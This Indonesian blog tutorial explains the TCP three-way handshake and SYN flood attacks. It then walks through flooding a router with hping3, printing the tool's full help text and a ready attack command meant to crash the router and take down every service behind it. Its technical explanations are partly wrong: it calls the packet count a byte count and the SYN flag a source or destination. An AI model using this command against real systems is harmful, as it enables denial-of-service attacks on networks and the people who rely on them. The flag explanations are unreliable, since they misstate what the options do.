Sebelum
menjelaskan mengenahi TCP SYN attack, penulis akan menjelaskan
mengenahi SYN ini terlebih dahulu, yang di sebut dengan SYN dan
bagaimana carakerjanya dalam jaringan internet
Sebenarnya
SYN adalah salah satu protocol yang berkerja dalam Transmision
Control Protocol atau TCP, yang berfungsi sebagai protocol perkenalan
alias protocol yang bermuatan data-data dan nama komputer pengirim
yang akan berkomunikasi dengan host lain
Dan
carakerjanya komputer satu yang hendak berkomunikasi dengan komputer
dua di dalam jaringan, komputer satu akan mengirim paket SYN ini
sebagai protocol yang akan memperkenalkan dirinya kepada komputer
yang akan melakukan pertukaran data denganya, ketika komputer dua
menerima paket SYN dari lawan bicaranya yang hendak membangun sebuah
jalur komunikasi komputer dua akan mengirim kembali paketan yang
dikirim oleh komputer satu dengan isi yang sama dan menambahkan
informasi mengenahi aktifnya host dan bisa berkomunikasi paketan
tersebut di sebut dengan SYN ACK, ilustrasi mudahnya kalian bisa
lihat gambar di bawah berikut
Dan di
dalam serangan SYN attack ini attacker akan mengirim data SYN dengan
jumlah yang banyak dan akan di kirim ke port-port pada host yang ada
dengan alamata atau isi data SYN yang tidak falid, sehingga host atau
kompuer yang menerima paket data tersebut menjadi bingung dan
mengirim paket data SYN ACK yang tidak ada tujuanya disini
mengakibatkan lost data SYN yang sangat banyak di dalam router dan
menyebabkan router menjadi crash karena menunggu balasan dari
komputer yang berada di dalam alamat SYN pertama kali
SYN ini
mengikuti alur three way handshake tcp, dan
pengertian dari three way handshake tcp itu sendiri ketika host 1
yang akan berkomunikasi dengan host 2 maka host satu akan mnegirim
paket SYN ini terlebih dahulu yang mencantumkan alamat dari host itu
sendiri dan host 2 sebagai penerima dan akan mengembalikanya ke host
1, dan di dalam data SYN tersebut tidak di rubah oleh host 2 yang
bertindak sebagai penerima, host 2 akan kembali mengirimkan paket SYN
itu kepda pemiliknya yang berisi data dari pemilik dan ditambah data
dari pengirim baru yaitu host penerima yang di sebut dengan SYN ACK
kemudian pemilik akan mengirim kembali paketan SYN tersebut yang
berisi data di antara kedua host dan di tambah persetujuan bahwa
mereka siap melakukan komunikasi dengan protocol TCP/IP
Inti
dari serangan diatas adalah seseorang yang menjadi attacker akan
mengirimkan paket yang seharusnya three way handshake tcp dengan
almat yang benar menjadi alamat yang tidak terdapat dalam jaringan
tersebut yang mengakibatkan ERROR di three
way handshake tcp yang
menyebabkan host yang di serangan akan mengirimkan paket yang sangat
banyak untuk menunggu respon dari pengirim, dan paket itu akan
membuat jaringan lalulintas di dalam jaringan menjadi penuh dan akan
menghambat komunikasi lainya
(DDoS SYN
attack)
Kita
akan membahas bagaimana menyerangan menggunakan SYN protocol ini,
gunakan komputer atau laptop windows kalian, lebih aman saran penulis
di virtual box kalian sendiri atau di dalam jaringan sendiri oke :)
Sofware
yang akan di gunakan untuk melakukan SYN Flooding ini Hping3 yang
sudah berada di kali linux dan backtrack dan juga distro pentest
linux lainya, jika belum ada kalian bisa install dengan cara “apt-get
install hping3” buka
terminal kalian atau console kalian dan ketikan haping3
–help dalam terminal
kalian dan kalian sudah dapat melihat perintah-perintah yang berada
di dalam hping3
root@N-gative:~#
hping3
--help
usage:
hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for
example -i u1000)
--fast alias for -i u10000 (10 packets for
second)
--faster alias for -i u1000 (100 packets for
second)
--flood sent packets as fast as possible. Don't
show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default
routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default
to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S
www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
--rand-dest random destionation address mode.
see the man.
--rand-source random source address mode. see the
man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to
estimate host traffic)
-f --frag split packets in more frag. (may
pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set don't fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if
packet size > mtu
-o --tos type of service (default 0x00), try
--tos help
-G --rroute includes RECORD_ROUTE option and
display the route buffer
--lsrr loose source routing and record
route
--ssrr strict source routing and record
route
-H --ipproto set the IP protocol field, only in
RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only
supported types)
--icmp-gw set gateway address for ICMP redirect
(default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP
timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP
address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port
(default random)
-p --destport [+][+]<port> destination
port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset
(instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP
checksum
many systems will fix the IP checksum
sending the packet
so you'll get bad UDP/TCP checksum
instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit
code
--tcp-mss enable the TCP MSS option with the
given value
--tcp-timestamp enable the TCP timestamp option to
guess the HZ/uptime
Common
-d --data data size
(default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and
prevent rewind
-T --traceroute traceroute mode
(implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP
in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to
monitor just one hop
--tr-no-rtt Don't calculate/show RTT information
in traceroute mode
ARS
packet description (new, unstable)
--apd-send Send the packet described with APD
(see docs/APD.txt)
Kalian
pelajari menggunakan hping terlebih dahulu seperti yang penulis
berikan akan menyerang melalui sudut router, jika router lumpuh dan
crash maka semua layanan yang akan menuju ke dalam jaringan akan mati
atau down “hping3 -I
wlan0 -c 1000000 --faster -S 10.10.10.1”
Penegrtina
mengenai perintah di atas menggunakan hping3 adalah sebagai berikut
ini
-I
= menunjukan interface yang di gunakan untuk bergabung dengan
jaringan
-c
= cont paket yang akan dikirim, dalam arti besar paket yang akan
dikirim 1000000 byte
--faster
= kecepatan persecond 1000 data yang akan di kirim dalam jaringan
tersebut
-S
= source atau tujuan yang akan di kirim paket floodjng ini
sumber:http://invisible-404.blogspot.com/2014/12/ddos-tcp-syn-attack.html
0 komentar:
Posting Komentar